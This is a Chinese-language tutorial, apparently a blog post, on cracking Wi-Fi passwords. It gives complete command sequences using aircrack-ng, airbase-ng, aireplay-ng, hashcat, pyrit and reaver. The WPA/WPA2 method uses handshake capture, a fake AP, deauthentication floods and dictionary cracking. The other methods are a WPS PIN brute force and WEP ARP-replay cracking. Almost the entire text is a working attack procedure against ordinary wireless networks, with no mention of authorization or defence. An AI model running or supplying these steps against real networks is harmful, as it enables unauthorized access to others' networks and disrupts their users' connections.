话不多说,先来看看字典破解 wpa2 的效果
===================================
![[WIFI] WIFI 破解(初级)](https://img.zhankr.net/fhs1jflfu5b255200.gif)
===============================================
字典破解 wifi-wpa/wpa2
目前最常用的加密类型
此方法只适合破解弱口令
其他暴力破解伤CPU/GPU
===============================================
1. 安装aircrack-ng
1. 直接使用apt-get,但有的软件仓库不是最新版
2. 源码安装 http://www.aircrack-ng.org/
* 现在要翻一下才能下载
2. 无线网卡开启monitor(建议另外使用usb无线网卡)
> sudo ifconfig wlan0 down
> sudo iwconfig wlan0 mode monitor
3. 查看无线网络,选择对象BSSID和CHN(通道),同时记下ESSID
> sudo airodump-ng wlan0
4. 对指定对象进行dump, 并记录连接该BSSID的STATION(CLIENTID, 也就是谁连了)
> sudo airodump-ng -w wpa2 -c CHN –bssid BSSID wlan0
* -w 为保存的抓包文件的前缀
* -c 为前面记录的通道
5. 创建fake AP(可以加快获取握手报文)
> sudo airbase-ng -a BSSID –essid ESSID -c CH -Z 4 -W 1 wlan0
* 如果是wpa 一般是 -z 2 z小写(TKIP)
* 如果是wpa2 一般是 -Z 4 Z大写(CCMP)
6. 向该网络内广播解除认证报文
> sudo aireplay-ng -0 0 -a BSSID -c CLIENTID –ignore-negative-one wlan0
7. 等待handshake
> 步骤4中右上脚显示收到handshake报文
> 使用aircrack-ng *.cap 探测是否包含handshake
> 当包含handshake报文时停止4,5,6
以下使用三种软件破解:
aircrack-ng
——
1. 开始破解
> aircrack-ng *.cap -w dict
* dict为字典文件,每一行一个密码
hashcat
——-
1. 将dump文件wpa2-01.cap转换为待破解格式文件done.hccap
> wpaclean out.cap wpa2-01.cap
> aircrack-ng out.cap -J done
2. 开始破解
> hashcat -m 2500 done.hccap dict
pyrit
——-
1. 开始破解
> pyrit -r wpa2-01.cap -i dict attack_passthrough
===========================================
通过PIN破解wifi
此方法需要wifi开启wps功能,且信号尽量好
目前大部分厂家的无线路由器默认是关闭wps的
同时也具有防PIN的功能
所以现在此方法用得不多了
===========================================
1. 网卡配置参考wpa/wpa2破解
2. 查看开启WPS的无线网络,选择对象BSSID
> sudo airodump-ng –wps wlan0
3. 开始破解
> sudo reaver -i wlan0 -b BSSID -vv
* 根据实际环境可以改变pin的间隔时间
4. 漫长的等待
============================================
WEP加密方式破解
如果有WEP加密的wifi基本都可以很快破解
但是很不幸,这种加密方式已很难见到
但是还是学习下
============================================
1. 网卡配置参考wpa/wpa2破解
2. 查看无线无线网络,找到加密方式为WEP的wifi, 记录对象BSSID
> sudo airodump-ng wlan0
3. 对指定对象进行dump
> sudo airodump-ng -w wep -c 10 –bssid BSSID wlan0
4. 向对象发送请求以获取更多的报文
> sudo aireplay-ng -1 0 -a BSSID wlan0
* 此步骤可选择攻击方式很多,可以自行man一下
5. 读取网络中的报文(读取上万后即可停止)
> sudo aireplay-ng -3 -b BSSID wlan0
6. 进行破解,利用当前目录下的.cap文件
> aircrack-ng wep-01.cap
7. 如果第6步破解失败,则重复5-6
